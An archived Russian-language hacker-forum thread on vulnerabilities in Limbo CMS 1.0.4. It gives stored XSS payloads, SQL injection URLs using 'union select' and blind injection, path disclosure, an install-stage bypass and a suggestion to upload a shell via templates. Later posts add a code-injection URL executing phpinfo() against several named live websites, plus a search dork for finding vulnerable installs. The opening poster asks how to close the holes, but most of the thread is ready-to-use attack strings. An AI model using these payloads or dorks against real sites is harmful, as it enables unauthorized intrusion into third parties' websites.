PDA

Просмотр полной версии : Уязвимости в Limbo CMS


Ershik
10.04.2008, 10:14
Из-за недавний событий начал искать ошибки на сайте.
Запустил денвер, поставил версию Limbo 1.0.4 Rus 3 и пошел смотреть...

Множественные XSS
Честно говоря, Либма, это одна большая xss :)

Обратная связь
http://test1.ru/limba/index.php?option=contact&Itemid=3&PHPSESSID=1fa783d6dc564bf45cc19f7ae0927250
Если в тело вписать скрипт "><script>alert()</script>
Он сработает, когда админ будет читать "обратную связь".

Форум
В тегах форум съедает "<script>", оставляя ">alert Можно в принципе зашифровать "<script>" и тогда xss сработает.
Логика, сам не проверял.

Чат
Никакой фильтрации в полях "текст.." и в "имя.." нет. Ситуация аналогична как и с обратной связью.
Добавление / редактирование объявлений (NewsFlash)
http://test1.ru/limba/admin.php?com_option=newsflash
Нет никакой фильтрации. "><script>alert()</script> спокойно проходит как в теле сообщения, отображаясь на главной странице, так и в самой администраторской.
Совершенно нет никакой фильтрации в модулях
http://test1.ru/limba/admin.php?com_option=modules&option=manage
Можно вписать скрипт вместо названии темы и он отобразится на главной странице и в админке.
Больше всего xss встречается в админке, практический в каждом приложении она присутствует.

Sql-injechion (?)
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49'
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+order+by+5/*
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+union+select+1,2,3,4,5/*
Этой баге подвержены: почти все модули на главной странице
Что странно, поля находяться, но нет вывода информации на экран, ИМХО надо писать эксплоит, чтобы ею воспользоваться.


раскрытие пути
Существует, правда, при установке движка, если админ дятел и не удалил папку "install"
http://test1.ru/limba/install/index.php?stage=0

http://test1.ru/limba/install/index.php?stage=sfsdfsdf


Warning: main(installsdsaf.php): failed to open stream: No such file or directory in z:\home\test1.ru\www\limba\install\index.php on line 51

Warning: main(): Failed opening 'installsdsaf.php' for inclusion (include_path='.;/usr/local/php/PEAR') in z:\home\test1.ru\www\limba\install\index.php on line 51

Похоже на инклуд, но он будет не нужет, если сможем установить лимбу, а из админки спокойно залить шелл через шаблоны.

Кстати, можно перескочить.
http://test1.ru/limba/install/index.php?stage=0 заменяем на
http://test1.ru/limba/install/index.php?stage=1 если прав не хватает, и устанавливаем систему.

А теперь вопрос к вам, уважаемые Античатовцы.
От всего спасает штассер, но может ли кто нибудь подсказать, как закрыть эти дыры? Найти было не проблема, сложнее для меня закрыть их(есть сайт на этом движке). Заметил попытки взлома и стал искать дыры, чере которые могли проникнуть.

HAXTA4OK
07.10.2009, 17:44
сорр за археологию, но заново создавать не оч охото

Limbo - Lite Mambo 1.0.4
SQL

index.php?option=weblinks&catid=[SQL]&Itemid=209


Result : index.php?option=weblinks&catid=78+union+select+1,2,3,4,5,6,7,8,9,10--&Itemid=209

index.php?option=content&pcontent=1&task=view&id=[blind SQL]&Itemid=194



Limbo - Lite Mambo 1.0.4.2RE3
SQL
index.php?option=content&task=view&id=[blind SQL]
index.php?option=weblinks&Itemid=[blind SQL]

l1ght
26.11.2009, 19:00
в 1.0.4 RE3, eval();
http://developinternet.ru/?option=lurm&no_html=0&secid=phpinfo();&id=1&fld=usr_image&task=showimg
http://1-fish.ru/?option=lurm&no_html=0&secid=phpinfo();&id=1&fld=usr_image&task=showimg
http://www.gim5cheb.ru/index.php?option=lurm&no_html=0&secid=phpinfo();&id=1&fld=usr_image&task=showimg
...

в 1.0.4 RE4 уже bsql, производитель:
http://limbo-cms.net.ru/index2.php?option=lurm&no_html=0&secid=7+order+by+1--+1
inurl:option=lurm

Nightmarе
26.11.2009, 19:17
в 1.0.4 RE3, lol();

в 1.0.4 RE4 уже bsql, производитель:

inurl:option=lurm
большое спс за уязвимость, можно ли вопрос как её закрыть?

zythar
26.11.2009, 19:23
добавить фильтрацию на параметр secid?

Nightmarе
26.11.2009, 19:31
а в каком он файле лежит? просто неохота ставить себе двиг и ковырять